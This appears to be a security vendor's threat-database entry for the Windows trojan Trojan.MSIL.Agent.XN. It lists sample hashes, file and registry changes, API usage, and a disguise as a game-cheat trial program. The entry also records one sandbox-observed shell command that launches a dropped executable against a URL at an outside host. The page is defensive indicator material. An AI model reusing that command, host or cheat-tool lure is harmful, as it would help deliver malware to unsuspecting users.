Multi-License Discount Quote

Change Region

English
Threat Database Trojans Trojan.MSIL.Agent.XN

Trojan.MSIL.Agent.XN

By CagedTech in Trojans

Threat Scorecard

Popularity Rank: 17,182
Threat Level: 80 % (High)
Infected Computers: 7
First Seen: May 23, 2024
Last Seen: March 3, 2026
OS(es) Affected: Windows

Analysis Report

General information

Family Name: Trojan.MSIL.Agent.XN
Signature status: No Signature

Known Samples

MD5: 4920d12d5fac236a8f26960256441aec
SHA1: edbecca860460ab9495f3d8449fd7ee0cb1aabef
SHA256: F1F8A9D20356F57E35336BC00975898629EC96D18BDFCD3A73ACE547CD51673B
File Size: 172.54 KB, 172544 bytes
MD5: 5f1e36e2d603ac7786d3a659023154a5
SHA1: 8be4f619a5e76b89e8da1ac6b0e74b34dd6f8246
SHA256: 95E97C3B6EF70ACB81CAD40648D6D60AB0CD7A7828B6F12EB604D814F02B1D44
File Size: 59.76 KB, 59760 bytes

Windows Portable Executable Attributes

  • File doesn't have "Rich" header
  • File doesn't have debug information
  • File doesn't have exports table
  • File doesn't have relocations information
  • File doesn't have security information
  • File is .NET application
  • File is 32-bit executable
  • File is console application (IMAGE_SUBSYSTEM_WINDOWS_CUI)
  • File is either console or GUI application
  • File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
Show More
  • File is Native application (NOT .NET application)
  • File is not packed
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Icons

Windows PE Version Information

Name Value
Assembly Version 1.0.0.0
Comments RCheatsGanteng
Company Name RCheatsGanteng
File Description FreeTrialPB
File Version 1.0.0.0
Internal Name FreeTrialPB.exe
Legal Copyright Copyright © 2025
Original Filename FreeTrialPB.exe
Product Name RCheatsGanteng
Product Version 1.0.0.0

File Traits

  • .NET
  • Default Version Info
  • x86

Block Information

Similar Families

  • MSIL.Agent.XN

Files Modified

File Attributes
c:\users\user\appdata\local\temp\nszb9b1.tmp Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nszb9b1.tmp\ijbbnurryh.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nszb9b1.tmp\ijbbnurryh.exe Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nszb9b1.tmp\ijbbnurryh.exe.config Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nszb9b1.tmp\ijbbnurryh.exe.config Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nszb9b1.tmp\noiusfgew.exe Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nszb9b1.tmp\noiusfgew.exe Synchronize,Write Attributes
c:\users\user\appdata\local\temp\nszb9b1.tmp\noiusfgew.exe.config Generic Write,Read Attributes
c:\users\user\appdata\local\temp\nszb9b1.tmp\noiusfgew.exe.config Synchronize,Write Attributes

Registry Modifications

Key::Value Data API Name
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet  RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 㣄휯꬚ǜ RegNtPreCreateKey
HKLM\system\controlset001\control\session manager::pendingfilerenameoperations *1\??\C:\Windows\SystemTemp\MicrosoftEdgeUpdate.exe.old5af52*1\??\C:\Windows\SystemTemp\CopilotUpdate.exe.old5af62*1\??\C:\P RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475 RegNtPreCreateKey

Windows API Usage

Category API
User Data Access
  • GetUserDefaultLocaleName
  • GetUserObjectInformation
Other Suspicious
  • AdjustTokenPrivileges
Anti Debug
  • IsDebuggerPresent
  • NtQuerySystemInformation
Process Manipulation Evasion
  • NtUnmapViewOfSection
  • ZwMapViewOfSection
Process Shell Execute
  • ShellExecuteEx
Syscall Use
  • ntdll.dll!NtAccessCheck
  • ntdll.dll!NtAlertThreadByThreadId
  • ntdll.dll!NtAlpcSendWaitReceivePort
  • ntdll.dll!NtApphelpCacheControl
  • ntdll.dll!NtClearEvent
  • ntdll.dll!NtClose
  • ntdll.dll!NtConnectPort
  • ntdll.dll!NtCreateEvent
  • ntdll.dll!NtCreateFile
  • ntdll.dll!NtCreateKey
Show More
  • ntdll.dll!NtCreateMutant
  • ntdll.dll!NtCreateSection
  • ntdll.dll!NtCreateSemaphore
  • ntdll.dll!NtDeviceIoControlFile
  • ntdll.dll!NtDuplicateObject
  • ntdll.dll!NtDuplicateToken
  • ntdll.dll!NtEnumerateKey
  • ntdll.dll!NtEnumerateValueKey
  • ntdll.dll!NtFreeVirtualMemory
  • ntdll.dll!NtMapViewOfSection
  • ntdll.dll!NtOpenEvent
  • ntdll.dll!NtOpenFile
  • ntdll.dll!NtOpenKey
  • ntdll.dll!NtOpenKeyEx
  • ntdll.dll!NtOpenProcessToken
  • ntdll.dll!NtOpenProcessTokenEx
  • ntdll.dll!NtOpenSection
  • ntdll.dll!NtOpenSemaphore
  • ntdll.dll!NtOpenThreadToken
  • ntdll.dll!NtOpenThreadTokenEx
  • ntdll.dll!NtProtectVirtualMemory
  • ntdll.dll!NtQueryAttributesFile
  • ntdll.dll!NtQueryDefaultLocale
  • ntdll.dll!NtQueryDirectoryFileEx
  • ntdll.dll!NtQueryFullAttributesFile
  • ntdll.dll!NtQueryInformationProcess
  • ntdll.dll!NtQueryInformationThread
  • ntdll.dll!NtQueryInformationToken
  • ntdll.dll!NtQueryKey
  • ntdll.dll!NtQueryPerformanceCounter
  • ntdll.dll!NtQuerySecurityAttributesToken
  • ntdll.dll!NtQuerySystemInformation
  • ntdll.dll!NtQueryValueKey
  • ntdll.dll!NtQueryVirtualMemory
  • ntdll.dll!NtQueryVolumeInformationFile
  • ntdll.dll!NtQueryWnfStateData
  • ntdll.dll!NtReadRequestData
  • ntdll.dll!NtReleaseMutant
  • ntdll.dll!NtReleaseSemaphore
  • ntdll.dll!NtReleaseWorkerFactoryWorker
  • ntdll.dll!NtRequestWaitReplyPort
  • ntdll.dll!NtSetEvent
  • ntdll.dll!NtSetInformationKey
  • ntdll.dll!NtSetInformationProcess
  • ntdll.dll!NtSetInformationThread
  • ntdll.dll!NtSetInformationVirtualMemory
  • ntdll.dll!NtSetInformationWorkerFactory
  • ntdll.dll!NtSubscribeWnfStateChange
  • ntdll.dll!NtTestAlert
  • ntdll.dll!NtTraceControl
  • ntdll.dll!NtUnmapViewOfSection
  • ntdll.dll!NtUnmapViewOfSectionEx
  • ntdll.dll!NtWaitForAlertByThreadId
  • ntdll.dll!NtWaitForSingleObject
  • ntdll.dll!NtWaitForWorkViaWorkerFactory
  • ntdll.dll!NtWaitLowEventPair
  • ntdll.dll!NtWorkerFactoryWorkerReady
  • ntdll.dll!NtWriteFile
  • UNKNOWN
Process Terminate
  • TerminateProcess

Shell Command Execution

(NULL) "C:\Users\Hqegudeb\AppData\Local\Temp\nszB9B1.tmp\noiusfgew.exe" "http://www.criersvivant.PW/ee/78110290?2429963f2429963=1584986378049441200=1- 8182"

Trending

Most Viewed

Loading...